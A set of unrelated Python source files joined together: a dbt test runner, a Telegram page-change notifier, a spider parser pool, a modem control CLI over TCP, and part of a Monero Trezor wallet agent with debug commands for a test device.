config_generator.write_yaml_config(test_root_dir, profiles_yaml, "profiles.yml")
return profiles_config
@staticmethod
def run_destination_process(message_file: str, test_root_dir: str, commands: List[str]):
print("Executing: ", " ".join(commands))
with open(os.path.join(test_root_dir, "destination_output.log"), "ab") as f:
process = subprocess.Popen(commands, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def writer():
if os.path.exists(message_file):
with open(message_file, "rb") as input_data:
while True:
line = input_data.readline()
if not line:
break
process.stdin.write(line)
process.stdin.close()
thread = threading.Thread(target=writer)
thread.start()
for line in iter(process.stdout.readline, b""):
f.write(line)
sys.stdout.write(line.decode("utf-8"))
thread.join()
process.wait()
return process.returncode == 0
def dbt_run(self, test_root_dir: str):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
# Perform sanity check on dbt project settings
assert self.run_check_dbt_command("debug", test_root_dir)
assert self.run_check_dbt_command("deps", test_root_dir)
final_sql_files = os.path.join(test_root_dir, "final")
shutil.rmtree(final_sql_files, ignore_errors=True)
# Compile dbt models files into destination sql dialect, then run the transformation queries
assert self.run_check_dbt_command("run", test_root_dir)
@staticmethod
def run_check_dbt_command(command: str, cwd: str) -> bool:
"""
Run dbt subprocess while checking and counting for "ERROR", "FAIL" or "WARNING" printed in its outputs
"""
error_count = 0
commands = [
"docker",
"run",
"--rm",
"--init",
"-v",
f"{cwd}:/workspace",
"-v",
f"{cwd}/build:/build",
"-v",
f"{cwd}/final:/build/run/airbyte_utils/models/generated",
"-v",
"/tmp:/tmp",
"--network",
"host",
"--entrypoint",
"/usr/local/bin/dbt",
"-i",
"airbyte/normalization:dev",
command,
"--profiles-dir=/workspace",
"--project-dir=/workspace",
]
print("Executing: ", " ".join(commands))
print(f"Equivalent to: dbt {command} --profiles-dir={cwd} --project-dir={cwd}")
with open(os.path.join(cwd, "dbt_output.log"), "ab") as f:
process = subprocess.Popen(commands, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=os.environ)
for line in iter(lambda: process.stdout.readline(), b""):
f.write(line)
str_line = line.decode("utf-8")
sys.stdout.write(str_line)
# keywords to match lines as signaling errors
if "ERROR" in str_line or "FAIL" in str_line or "WARNING" in str_line:
# exception keywords in lines to ignore as errors (such as summary or expected warnings)
is_exception = False
for except_clause in [
"Done.", # DBT Summary
"PASS=", # DBT Summary
"Nothing to do.", # When no schema/data tests are setup
"Configuration paths exist in your dbt_project.yml", # When no cte / view are generated
"Error loading config file: .dockercfg: $HOME is not defined", # ignore warning
]:
if except_clause in str_line:
is_exception = True
break
if not is_exception:
# count lines signaling an error/failure/warning
error_count += 1
process.wait()
message = (
f"{' '.join(commands)}\n\tterminated with return code {process.returncode} "
f"with {error_count} 'Error/Warning/Fail' mention(s)."
)
print(message)
assert error_count == 0, message
assert process.returncode == 0, message
if error_count > 0:
return False
return process.returncode == 0
@staticmethod
def copy_replace(src, dst, pattern=None, replace_value=None):
"""
Copies a file from src to dst replacing pattern by replace_value
Parameters
----------
src : string
Path to the source filename to copy from
dst : string
Path to the output filename to copy to
pattern
list of Patterns to replace inside the src file
replace_value
list of Values to replace by in the dst file
"""
file1 = open(src, "r") if isinstance(src, str) else src
file2 = open(dst, "w") if isinstance(dst, str) else dst
pattern = [pattern] if isinstance(pattern, str) else pattern
replace_value = [replace_value] if isinstance(replace_value, str) else replace_value
if replace_value and pattern:
if len(replace_value) != len(pattern):
raise Exception("Invalid parameters: pattern and replace_value" " have different sizes.")
rules = [(re.compile(regex, re.IGNORECASE), value) for regex, value in zip(pattern, replace_value)]
else:
rules = []
for line in file1:
if rules:
for rule in rules:
line = re.sub(rule[0], rule[1], line)
file2.write(line)
if isinstance(src, str):
file1.close()
if isinstance(dst, str):
file2.close()
|
webpage_check.py
|
from telegram.ext import Updater, CommandHandler
import threading
import requests
import logging
import time
logging.basicConfig(level=logging.INFO)
token = ""
target_url = ""
chat_ids = set()
updater = Updater(token)
def page_updated():
interval = 5
older = requests.get(target_url).text
while True:
if len(chat_ids) > 0:
page_data = requests.get(target_url).text
if page_data != older:
older = page_data
for chat_id in chat_ids:
updater.bot.send_message(chat_id=chat_id, text="Pagina aggiornata!")
time.sleep(interval)
def start(update, context):
chat_id = update.effective_chat.id
chat_ids.add(chat_id)
logging.info("{}: start".format(chat_id))
def end(update, context):
chat_id = update.effective_chat.id
chat_ids.remove(chat_id)
logging.info("{}: stop".format(chat_id))
def main():
updater.dispatcher.add_handler(CommandHandler("start", start))
updater.dispatcher.add_handler(CommandHandler("end", end))
threading.Thread(target=page_updated).start()
updater.start_polling()
updater.idle()
if __name__ == "__main__":
main()
|
parser_pipeline.py
|
import logging
import multiprocessing
PARSER_PROCESS_JOIN_TIMEOUT = 3
logger = logging.getLogger('grab.spider.parser_pipeline')
class ParserPipeline(object):
def __init__(self, bot, mp_mode, pool_size, shutdown_event,
network_result_queue, parser_result_queue,
requests_per_process):
self.bot = bot
self.mp_mode = mp_mode
if not self.mp_mode:
self.pool_size = 1
else:
if pool_size is not None:
self.pool_size = pool_size
else:
self.pool_size = multiprocessing.cpu_count()
self.shutdown_event = shutdown_event
self.network_result_queue = network_result_queue
self.parser_result_queue = parser_result_queue
self.requests_per_process = requests_per_process
self.parser_pool = []
for x in range(self.pool_size):
is_parser_idle, proc = self.start_parser_process()
self.parser_pool.append({
'is_parser_idle': is_parser_idle,
'proc': proc,
})
def start_parser_process(self):
if self.mp_mode:
from multiprocessing import Process, Event
else:
from multiprocessing.dummy import Process, Event
is_parser_idle = Event()
if self.mp_mode:
bot = self.bot.__class__(
network_result_queue=self.network_result_queue,
parser_result_queue=self.parser_result_queue,
is_parser_idle=is_parser_idle,
shutdown_event=self.shutdown_event,
parser_requests_per_process=self.requests_per_process,
parser_mode=True,
meta=self.bot.meta)
else:
# In non-multiprocess mode we start `run_process`
# method in new semi-process (actually it is a thread)
# Because the use `run_process` of main spider instance
# all changes made in handlers are applied to main
# spider instance, that allows to suppport deprecated
# spiders that do not know about multiprocessing mode
bot = self.bot
bot.network_result_queue = self.network_result_queue
bot.parser_result_queue = self.parser_result_queue
bot.is_parser_idle = is_parser_idle
bot.shutdown_event = self.shutdown_event
bot.parser_requests_per_process = self.requests_per_process,
bot.meta = self.bot.meta
proc = Process(target=bot.run_parser)
if not self.mp_mode:
proc.daemon = True
proc.start()
return is_parser_idle, proc
def check_pool_health(self):
for proc in self.parser_pool:
if not proc['proc'].is_alive():
self.bot.stat.inc('parser-pipeline-restore')
logger.debug('Restoring died parser process')
is_parser_idle, new_proc = self.start_parser_process()
self.parser_pool.append({
'is_parser_idle': is_parser_idle,
'proc': new_proc,
})
self.parser_pool.remove(proc)
def shutdown(self):
for proc in self.parser_pool:
if self.mp_mode:
pname = proc['proc'].pid
else:
pname = proc['proc'].name
logger.debug('Started shutdown of parser process: %s' % pname)
proc['proc'].join(
PARSER_PROCESS_JOIN_TIMEOUT)
if proc['proc'].is_alive():
if self.mp_mode:
print('Process %s does not respond. Finish him!' % pname)
proc['proc'].terminate()
else:
# do nothing, because in
# non-mp mode parser threads
# have daemon=True flag
pass
logger.debug('Finished joining parser process: %s' % pname)
|
cli_shell.py
|
from cmd import Cmd
import socket
import logging
import threading
import time
import signal
import threading
import time
import select
import socket
import logging
import threading
import time
import signal
import threading
import time
import select
import sys
argi = len(sys.argv) - 1
assert(argi == 2)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.close()
exit_now = False
ip_connection_ok = False
address = sys.argv[1] #'127.0.0.1'
port = int(sys.argv[2]) #50008
def print_rx_data_thread():
global sock
global exit_now
global address
global port
global ip_connection_ok
while not exit_now:
if ip_connection_ok:
ready = select.select([sock], [], [], 0.1)
if ready[0]:
try:
data = sock.recv(1024)
if not data:
print('Empty data. closing client.')
sock.close()
ip_connection_ok = False
else:
out = '%s$> ' % data
sys.stdout.write(out)
sys.stdout.flush()
except Exception as e:
print("recv failed. Exception is %s" % e)
ip_connection_ok = False
sock.close()
else:
try:
print("\r\nTry to connect to %s:%d" % (address, port))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address, port))
ip_connection_ok = True
print("Connection to %s:%d is Ok" % (address, port))
except Exception as e:
ip_connection_ok = False
i = 0
while i < 20:
if exit_now:
print("\r\nRX data thread break")
sys.stdout.flush()
break
i += 1
time.sleep(0.1)
exit_now = True
if ip_connection_ok:
ip_connection_ok = False
sock.close()
print("\r\nRX data thread exit")
sys.stdout.flush()
def CliSendIp(id, cmd, args, input):
if ip_connection_ok:
buff = '<id="0x%x" name="%s" arglist="%s" args="%s">' % (id, cmd, args, input)
sock.send(buff.format().strip('\n').strip(' '))
else:
print("cli server not connected")
class CliShellPrompt(Cmd):
prompt = '$> '
intro = "Welcome! Type ? or press tab to list commands"
def emptyline(self):
return False
def do_exit(self, inp):
global exit_now
global ip_connection_ok
exit_now = True
task.join()
if ip_connection_ok:
ip_connection_ok = False
sock.close()
print("Cli exit")
return True
def do_modem_status(self, inp):
CliSendIp(0x0b5151cd, "modem_status", "", "{}".format(inp))
def do_modem_com_enable_async_rx_print(self, inp):
CliSendIp(0x0bb8a2a1, "modem_com_enable_async_rx_print", "", "{}".format(inp))
def do_modem_com_disable_async_rx_print(self, inp):
CliSendIp(0x151b0c4d, "modem_com_disable_async_rx_print", "", "{}".format(inp))
def do_log_list_loggers(self, inp):
CliSendIp(0x170aa9d3, "log_list_loggers", "", "{}".format(inp))
def do_modem_com_read_rx_data(self, inp):
CliSendIp(0x276df8fd, "modem_com_read_rx_data", "", "{}".format(inp))
def do_modem_hw_reset(self, inp):
CliSendIp(0x2b17a495, "modem_hw_reset", "", "{}".format(inp))
def do_modem_sms_delete(self, inp):
CliSendIp(0x3598398c, "modem_sms_delete", "u:uId", "{}".format(inp))
def do_log_status(self, inp):
CliSendIp(0x362d73ec, "log_status", "", "{}".format(inp))
def do_modem_sms_send(self, inp):
CliSendIp(0x3ff673f2, "modem_sms_send", "s:sNumber s:sData", "{}".format(inp))
def do_modem_hw_power_off(self, inp):
CliSendIp(0x47c38d54, "modem_hw_power_off", "", "{}".format(inp))
def do_modem_sms_status(self, inp):
CliSendIp(0x61d0d0e1, "modem_sms_status", "", "{}".format(inp))
def do_log_set_verbosity(self, inp):
CliSendIp(0x66502d4d, "log_set_verbosity", "s:sVerbosity", "{}".format(inp))
def do_modem_sms_read(self, inp):
CliSendIp(0x7d3537d2, "modem_sms_read", "u:uId", "{}".format(inp))
def do_modem_sms_list(self, inp):
CliSendIp(0x8695ac23, "modem_sms_list", "", "{}".format(inp))
def do_modem_hw_status(self, inp):
CliSendIp(0x98e202f2, "modem_hw_status", "", "{}".format(inp))
def do_modem_call_status(self, inp):
CliSendIp(0xa39e4493, "modem_call_status", "", "{}".format(inp))
def do_modem_call_dial(self, inp):
CliSendIp(0xb868e062, "modem_call_dial", "s:sNumber", "{}".format(inp))
def do_modem_com_write_tx_data(self, inp):
CliSendIp(0xd0b1b299, "modem_com_write_tx_data", "s:sPort s:sData", "{}".format(inp))
def do_cli_ping(self, inp):
CliSendIp(0xd26fa6b4, "cli_ping", "", "{}".format(inp))
def do_modem_call_hang(self, inp):
CliSendIp(0xd3f2c3c1, "modem_call_hang", "", "{}".format(inp))
def do_modem_hw_power_on(self, inp):
CliSendIp(0xdddb4f3b, "modem_hw_power_on", "", "{}".format(inp))
def default(self, inp):
print('Invalid command <%s>\r\n%s' % ("{}".format(inp), self.prompt))
do_EOF = do_exit
if __name__ == '__main__':
def signal_handler(sig, frame):
global exit_now
exit_now = True
signal.signal(signal.SIGINT, signal_handler)
task = threading.Thread(target=print_rx_data_thread)
task.start()
time.sleep(0.1)
CliShellPrompt().cmdloop()
|
agent.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Dusan Klinec, ph4r05, 2018
#
# Note pickling is used for message serialization.
# This is just for the prototyping & fast PoC, pickling wont be used in the production.
# Instead, protobuf messages will be defined and parsed to avoid malicious pickling.
#
import argparse
import asyncio
import binascii
import datetime
import json
import logging
import os
import re
import sys
import threading
import time
from monero_glue.agent import agent_lite, agent_misc
from monero_glue.agent.agent_lite import SignAuxData
from monero_glue.messages import DebugMoneroDiagRequest, Entropy, GetEntropy
from monero_glue.xmr import common, crypto, daemon_rpc, monero, wallet, wallet_rpc
from monero_glue.xmr.common import try_fnc
from monero_glue.xmr.enc import chacha, chacha_poly
from monero_glue.xmr.sub import addr as xmr_addr
from monero_poc.utils import cli, misc, trace_logger
from monero_poc.utils.misc import TrezorAddressMismatchError
from monero_poc.utils.trezor_server_proxy import TokenProxy
from monero_serialize import xmrboost, xmrserialize, xmrtypes
from trezorlib import debuglink, device
import coloredlogs
from cmd2 import Cmd
logger = logging.getLogger(__name__)
coloredlogs.CHROOT_FILES = []
coloredlogs.install(level=logging.WARNING, use_chroot=False)
class HostAgent(cli.BaseCli):
"""
Host agent wrapper
"""
prompt = "$> "
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.args = None
self.network_type = None
self.address = None
self.address_info = None # type: xmr_addr.AddrInfo
self.address_base_info = None # type: xmr_addr.AddrInfo
self.priv_view = None
self.pub_view = None
self.pub_spend = None
self.network_type = None
self.account_idx = 0 # major sub-address index
self.wallet_salt = None
self.wallet_password = b""
self.wallet_file = None
self.monero_bin = None
self.rpc_addr = "127.0.0.1:18081"
self.rpc_passwd = None
self.rpc_bind_port = 48084
self.rpc_running = False
self.rpc_ready = False
self.trace_logger = trace_logger.Tracelogger(logger)
self.loop = asyncio.get_event_loop()
self.worker_loop = asyncio.new_event_loop()
self.worker_thread = threading.Thread(
target=self.looper, args=(self.worker_loop,)
)
self.worker_thread.setDaemon(True)
self.worker_thread.start()
self.wallet_thread = None
self.terminating = False
self.trezor_proxy = None # type: TokenProxy
self.agent = None # type: agent_lite.Agent
self.token_debug = False
self.token_path = None
self.fresh_wallet = False
self.wallet_proxy = wallet_rpc.WalletRpc(
self, self.rpc_bind_port, self.rpc_passwd
)
self.daemon_rpc = daemon_rpc.DaemonRpc()
self.wallet_obj = wallet.Wallet(self.daemon_rpc)
def looper(self, loop):
"""
Main looper
:param loop:
:return:
"""
asyncio.set_event_loop(loop)
loop.run_forever()
def submit_coro(self, coro):
"""
Submits corroutine to the worker loop
:param fnc:
:param args:
:param kwargs:
:return:
"""
return asyncio.run_coroutine_threadsafe(coro, self.worker_loop)
def wait_coro(self, coro):
"""
Runs corouting, waits for result
:param fnc:
:param args:
:param kwargs:
:return:
"""
future = self.submit_coro(coro)
return future.result()
#
# CLI
#
def update_intro(self):
"""
Updates intro text for CLI header - adds version to it.
:return:
"""
self.intro = (
"-" * self.get_term_width()
+ "\n Monero Trezor agent\n"
+ "\n"
+ "-" * self.get_term_width()
)
def update_prompt(self):
"""
Prompt update
:return:
"""
flags = []
if not self.rpc_running:
flags.append("R!")
if not self.rpc_ready:
flags.append("Loading" if not self.fresh_wallet else "Syncing")
flags_str = "|".join(flags)
flags_suffix = "|" + flags_str if len(flags_str) > 0 else ""
self.prompt = "[wallet %s%s]: " % (
self.address[:6].decode("ascii") if self.address else "",
flags_suffix,
)
def token_cmd(self, coro):
try:
res = self.wait_coro(coro)
return res
except Exception as e:
print("Trezor error (e: %s)" % e)
self.trace_logger.log(e)
raise e
#
# Handlers
#
def check_rpc(self):
try_debug = None
if not self.args.debug_rpc:
try_debug = (
"Consider running with --debug-rpc flag to show RPC wallet "
"output for closer inspection and diagnosis"
)
if not self.rpc_running:
self.perror("Monero RPC wallet is not running.")
if try_debug:
self.poutput(try_debug)
return False
elif not self.rpc_ready:
self.perror("Monero RPC wallet is not yet ready, please wait a moment")
self.poutput(
"RPC wallet is not available during the blockchain scanning, it may take a while"
)
if try_debug:
self.poutput(try_debug)
return False
return True
def check_address(self):
pres = self.token_cmd(self.agent.get_address(account=self.account_idx))
if self.address != pres.address:
self.perror("Connected TREZOR address does not match wallet address")
raise TrezorAddressMismatchError()
def do_quit(self, line):
self.terminating = True
return super().do_quit(line)
do_q = do_quit
do_Q = do_quit
# def do_account(self, line):
# self.set_account(int(line))
def do_address(self, line):
print(self.address.decode("ascii"))
def do_ping(self, line):
pres = self.token_cmd(self.trezor_proxy.ping())
if pres:
print("OK %s" % pres)
def do_check_trezor(self, line):
self.check_address()
self.poutput("OK")
def do_state(self, line):
if not self.rpc_running:
self.perror("RPC wallet is not running")
else:
self.poutput("RPC wallet: running")
if self.rpc_ready:
self.poutput("RPC wallet: ready")
elif self.fresh_wallet:
self.poutput("RPC wallet: synchronising")
else:
self.poutput("RPC wallet: starting")
def do_get_watch_only(self, line):
pres = self.token_cmd(self.agent.get_watch_only())
print("View key: %s" % binascii.hexlify(pres.watch_key).decode("utf8"))
print("Address: %s" % pres.address.decode("utf8"))
def do_get_address(self, line):
pres = self.token_cmd(self.agent.get_address(account=self.account_idx))
print("Address: %s" % pres.address.decode("utf8"))
def do_balance(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.balance()
print("Balance: %.5f" % wallet.conv_disp_amount(res["result"]["balance"]))
print(
"Unlocked Balance: %.5f"
% wallet.conv_disp_amount(res["result"]["unlocked_balance"])
)
def do_height(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.height()
print("Height: %s" % res["result"]["height"])
def do_get_transfers(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.get_transfers({"pool": True, "in": True, "out": True})
print(json.dumps(res, indent=2))
def do_rescan_bc(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.rescan_bc()
print(json.dumps(res, indent=2))
def do_key_image_sync(self, line):
if not self.check_rpc():
return
self.check_address()
self.wait_coro(self.key_image_sync(line))
def do_refresh(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.refresh()
print(json.dumps(res, indent=2))
def do_transfer(self, line):
if not self.check_rpc():
return
self.check_address()
if len(line) == 0:
print(
"Usage: transfer [<priority>] [<ring_size>] <address> <amount> [<payment_id>]"
)
parts = [x for x in line.split(" ") if len(x.strip()) > 0]
res = misc.parse_transfer_cmd(parts)
return self.transfer_cmd(res)
def do_sweep_dust(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.sweep_dust({"do_not_relay": True})
if "result" not in res:
logger.error("Sweep dust error: %s" % res)
raise ValueError("Could not transfer")
result = res["result"]
unsigned = binascii.unhexlify(result["unsigned_txset"])
self.wait_coro(self.sign_unsigned(unsigned))
def do_sweep_all(self, line):
if not self.check_rpc():
return
if len(line) == 0:
self.poutput(
"sweep_all [index=<N1>[,<N2>,...]] [<priority>] [<ring_size>] <address> [<payment_id>]"
)
return
params = misc.parse_sweep_all(line)
self.sweep_cmd(params, is_all=True)
def do_sweep_below(self, line):
if not self.check_rpc():
return
if len(line) == 0:
self.poutput(
"sweep_below <amount_threshold> [index=<N1>[,<N2>,...]] [<priority>] [<ring_size>] <address> [<payment_id>]"
)
return
params = misc.parse_sweep_below(line)
self.sweep_cmd(params, is_below=True)
def do_sweep_single(self, line):
if not self.check_rpc():
return
if len(line) == 0:
self.poutput(
"sweep_single [<priority>] [<ring_size>] <key_image> <address> [<payment_id>]"
)
return
params = misc.parse_sweep_below(line)
self.sweep_cmd(params, is_single=True)
def do_sign(self, line):
if not self.check_rpc():
return
self.check_address()
self.wait_coro(self.sign_wrap(line))
def do_init(self, line):
mnemonic12 = "alcohol woman abuse must during monitor noble actual mixed trade anger aisle"
mnemonic24 = "permit universe parent weapon amused modify essay borrow tobacco budget walnut lunch consider gallery ride amazing frog forget treat market chapter velvet useless topple"
init_mode = 0 if len(line) == 0 else int(line)
mnemonic = mnemonic12 if len(line) == 0 or int(line) == 0 else mnemonic24
print(self.trezor_proxy.client)
device.wipe(self.trezor_proxy.client)
debuglink.load_device_by_mnemonic(
client=self.trezor_proxy.client,
mnemonic=mnemonic,
pin="1234" if init_mode >= 2 else "",
passphrase_protection=init_mode >= 3,
label="ph4test",
language="english",
)
def do_get_entropy(self, line):
parts = line.split(" ")
size = int(parts[0])
path = parts[1]
self.wait_coro(self.get_entropy(size, path))
def do_tdeb(self, line):
is_deb = bool(int(line))
print("Token debug set to: %s" % is_deb)
self.token_debug = is_deb
def do_switch(self, line):
line = line.strip()
path = "bridge:web01"
if line == "udp":
path = "udp:127.0.0.1:21324"
elif ":" in line:
path = line
elif len(line) == 0:
path = self.choose_trezor()
if "bridge" in path:
self.token_debug = False
print("Switching to device: %s" % path)
self.token_path = path
self.wait_coro(self.connect(path))
def do_reconnect(self, line):
self.wait_coro(self.connect(self.token_path))
def do_enumerate(self, line):
from monero_glue.trezor import manager as tmanager
r = tmanager.Trezor.enumerate()
for x in r:
print(x)
def do_diag(self, line):
m = re.match(r"^\s*(\d+)(?:(\s+\d+)(?:(\s+\d+)([\s\d]+))?)?\s*$", line.strip())
if m is None:
print("Usage: diag INS [p1 [p2 [ints...]]")
return
diag_code = int(m.group(1))
p1 = int(m.group(2)) if m.group(2) else None
p2 = int(m.group(3)) if m.group(3) else None
ints = [int(x) for x in re.sub(r"\s{2,}", " ", m.group(4).strip()).split(" ")] if m.group(4) else None
print("Diagnosis: %d p1: %s p2: %s params: %s" % (diag_code, p1, p2, ints))
msg = DebugMoneroDiagRequest(ins=diag_code, p1=p1, p2=p2, pd=ints)
try:
resp = self.wait_coro(self.trezor_proxy.call(msg))
print(resp)
except Exception as e:
self.trace_logger.log(e)
logger.warning(e)
complete_sign = Cmd.path_complete
#
# Logic
#
def set_network_type(self, ntype):
self.network_type = ntype
self.agent.network_type = ntype
async def is_connected(self):
"""
Returns True if Trezor is connected
:return:
"""
try:
await self.trezor_proxy.ping()
return True
except Exception as e:
return False
async def load_watchonly(self):
"""
Loads watch-only credentials from connected Trezor
:return:
"""
if not await self.is_connected():
logger.error("Trezor is not connected")
raise agent_misc.TrezorNotRunning("Could not load watch-only credentials")
try:
print(
"Loading watch-only credentials from Trezor. Please, confirm the request on Trezor."
)
self.set_network_type(
monero.NetworkTypes.TESTNET
if self.args.testnet
else monero.NetworkTypes.MAINNET
)
res = await self.agent.get_watch_only() # type: messages.MoneroWatchKey
self.priv_view = crypto.decodeint(res.watch_key)
self.set_address(res.address)
await self.open_with_keys(self.priv_view, self.address)
except Exception as e:
if not self.args:
raise ValueError(e)
else:
logger.warning("Loading watch-only keys failed (but init is not required), %s" % (e,))
async def get_entropy(self, size, path):
"""
Loads entropy from the device, writes to the path
:param size:
:param path:
:return:
"""
logger.info("Loading entropy of %s B to %s" % (size, path))
with open(path, "wb+") as fh:
csize = 0
while csize < size:
req = GetEntropy(size=1024 * 10)
res = await self.trezor_proxy.call_in_session(req) # type: Entropy
csize += len(res.entropy)
logger.debug(
" .. loaded %s / %s (%s %%)" % (csize, size, 100.0 * csize / size)
)
fh.write(res.entropy)
logger.info("Entropy loading done")
def load_params(self):
"""
Args
:return:
"""
if self.args.rpc_addr:
self.rpc_addr = self.args.rpc_addr
if self.args.watch_wallet:
self.wallet_file = self.args.watch_wallet
if self.args.monero_bin:
self.monero_bin = self.args.monero_bin
def choose_trezor(self):
from monero_glue.trezor import manager as tmanager
r = tmanager.Trezor.enumerate()
noptions = len(r)
if noptions == 0:
self.perror("No TREZOR device found")
raise EnvironmentError("No usable device")
elif noptions == 1:
self.poutput("Detected TREZOR: %s" % r[0])
return str(r[0])
choices = [(i, str(r[i])) for i in range(noptions)]
res = self.select(choices, "Please select from connected devices: ")
return str(r[res])
def monkey_patch_trezorlib(self):
logger.info(
"Monkey-patching trezorlib with the current messages versions fromt trezor-common"
)
try:
import trezorlib
from monero_glue import protobuf
from monero_glue import messages
from trezorlib import protobuf as tprotobuf
tprotobuf.UVarintType = protobuf.UVarintType
tprotobuf.SVarintType = protobuf.SVarintType
tprotobuf.BoolType = protobuf.BoolType
tprotobuf.BytesType = protobuf.BytesType
tprotobuf.UnicodeType = protobuf.UnicodeType
tprotobuf.MessageType = protobuf.MessageType
trezorlib.messages = messages
from trezorlib import mapping
trezorlib.mapping.map_type_to_class = {}
trezorlib.mapping.map_class_to_type = {}
trezorlib.mapping.build_map()
except Exception as e:
logger.error("Monkey patching error: %s" % e)
async def connect(self, path=None):
"""
Connects to the trezor
:return:
"""
if not self.args.poc or (self.args.trezor_path or path):
if self.args.patch_client:
self.monkey_patch_trezorlib()
from monero_glue.trezor import manager as tmanager
t_path = path if path else self.args.trezor_path
if t_path is None or len(t_path) == 0:
self.token_path = self.choose_trezor()
t_path = self.token_path
self.trezor_proxy = tmanager.Trezor(path=t_path, debug=self.token_debug)
else:
self.trezor_proxy = TokenProxy()
ntype = self.agent.network_type if self.agent else self.network_type
self.agent = agent_lite.Agent(
self.trezor_proxy, network_type=ntype
)
async def open_account(self):
"""
Opens the watch only account
:return:
"""
creds_passed = self.args.view_key is not None and self.args.address is not None
account_file_set = self.args.account_file is not None
account_file_ex = (
os.path.exists(self.args.account_file) if account_file_set else False
)
if creds_passed:
await self.open_account_passed()
elif account_file_ex:
await self.open_account_file(self.args.account_file)
else:
self.load_params()
await self.check_params(True)
await self.load_watchonly()
self.load_params()
if account_file_set and not account_file_ex:
await self.check_params(True)
self.wallet_password = await self.prompt_password(True)
# Create watch only wallet file for monero-wallet-rpc
await self.ensure_watch_only()
# Write acquired data to the account file
if account_file_set and not account_file_ex:
await self.save_account(self.args.account_file)
if self.pub_spend:
print(
"Public spend key: %s"
% binascii.hexlify(crypto.encodepoint(self.pub_spend)).decode("ascii")
)
print(
"Public view key : %s"
% binascii.hexlify(crypto.encodepoint(self.pub_view)).decode("ascii")
)
if self.address:
print("Address: %s" % self.address.decode("utf8"))
self.update_intro()
self.update_prompt()
async def check_params(self, new_wallet=False):
"""
All params correctly entered?
:return:
"""
if not new_wallet:
return
if self.args.sign is not None:
return
if self.wallet_file is None:
logger.error(
"--watch-wallet file is not set. Please specify path where to create the monero watch wallet"
)
sys.exit(1)
if self.monero_bin is None:
logger.error(
"--monero-bin is not set. Please specify path to the monero binaries"
)
sys.exit(1)
async def prompt_password(self, new_wallet=False):
"""
Prompts password for a new wallet
:param new_wallet:
:return:
"""
if new_wallet:
passwd = self.ask_password(
"Creating a new wallet. Please, enter the password: ", True
)
else:
passwd = self.ask_password("Please, enter the wallet password: ", False)
return passwd.encode("utf8")
async def save_account(self, file):
"""
Stores account data
:param file:
:return:
"""
if self.wallet_salt is None:
self.wallet_salt = crypto.random_bytes(32)
# Wallet view key encryption
wallet_enc_key = misc.wallet_enc_key(self.wallet_salt, self.wallet_password)
ciphertext = chacha_poly.encrypt_pack(
wallet_enc_key, crypto.encodeint(self.priv_view)
)
with open(file, "w") as fh:
data = {
"view_key_enc": binascii.hexlify(ciphertext).decode("ascii"),
"address": self.address.decode("ascii"),
"network_type": self.network_type,
"wallet_salt": binascii.hexlify(self.wallet_salt).decode("ascii"),
"rpc_addr": self.rpc_addr,
"wallet_file": self.wallet_file,
"monero_bin": self.monero_bin,
}
json.dump(data, fh, indent=2)
async def check_existing_wallet_file(self, key_file):
"""
Checks existing wallet file correctness
:param key_file:
:return:
"""
wl = await wallet.load_keys_file(key_file, self.wallet_password)
addr = wl["key_data"]["m_keys"]["m_account_address"]
spend_pub = addr["m_spend_public_key"]
view_pub = addr["m_view_public_key"]
match = spend_pub == crypto.encodepoint(
self.pub_spend
) and view_pub == crypto.encodepoint(self.pub_view)
net_ver = monero.net_version(self.network_type, False)
addr = monero.encode_addr(net_ver, spend_pub, view_pub)
return addr, match
async def wallet_restore_param(self):
self.poutput(
"Creating a new wallet file, please enter the blockchain height to start a restore of the wallet."
)
self.poutput(
" - Restore height should be a little less than your first incoming transaction to the wallet."
)
self.poutput(' - If the wallet was never used before, enter "-"')
self.poutput(
' - If you are not sure enter "0" to start from the beginning (may take few minutes)'
)
self.poutput(" - You may enter also a date in the format YYYY-MM-DD\n")
height = 0
sure_stage = False
while True:
if sure_stage:
if (
self.ask_proceed_quit(
"The height: %s. Is it correct? (y/n) " % height
)
== self.PROCEED_YES
):
break
height = misc.py_raw_input("Restore height: ").strip().lower()
if height == "-":
height = await self.wallet_obj.get_height()
sure_stage = True
continue
elif len(height) == 0:
height = 0
sure_stage = True
continue
m = re.match(r"^(\d{4})-(\d{1,2})-(\d{1,2})$", height)
if m:
year, month, day = int(m.group(1)), int(m.group(2)), int(m.group(3))
try:
height = await self.wallet_obj.get_blockchain_height_by_date(
year, month, day
)
sure_stage = True
continue
except Exception as e:
logger.warning("Could not resolve date to the height: %s" % e)
self.trace_logger.log(e)
r = self.ask_proceed_quit(
"Could not resolve date to height. Do you want to try again? (y/n) "
)
if r == self.PROCEED_YES:
continue
else:
return 0
else:
try:
height = int(height)
sure_stage = True
continue
except Exception as e:
self.poutput("Invalid format")
sure_stage = False
continue
return height
async def ensure_watch_only(self):
"""
Ensures watch only wallet for monero exists
:return:
"""
if self.wallet_file is None:
return
key_file = "%s.keys" % self.wallet_file
match, addr = False, None
if self.pub_view and os.path.exists(key_file):
logger.debug("Watch only wallet key file exists: %s" % key_file)
try:
addr, match = await self.check_existing_wallet_file(key_file)
except Exception as e:
logger.error("Wallet key file processing exception: %s" % e)
if not match:
logger.error("Key file address is not correct: %s" % addr)
if not self.args.no_init:
print("Please, move the file so Agent can create correct key file")
sys.exit(2)
return
if not addr and self.args.no_init:
logger.info("Device not initialized, skipping wallet setup")
return
if not self.args.no_init and not self.pub_view:
raise ValueError("Wallet key not loaded")
self.fresh_wallet = True
account_keys = xmrtypes.AccountKeys()
key_data = wallet.WalletKeyData()
restore_height = await self.wallet_restore_param()
self.poutput("Wallet restore height: %s" % restore_height)
wallet_data = wallet.WalletKeyFile()
wallet_data.key_data = key_data
wallet_data.watch_only = 1
wallet_data.testnet = self.network_type == monero.NetworkTypes.TESTNET
wallet_data.refresh_height = restore_height
key_data.m_creation_timestamp = int(time.time())
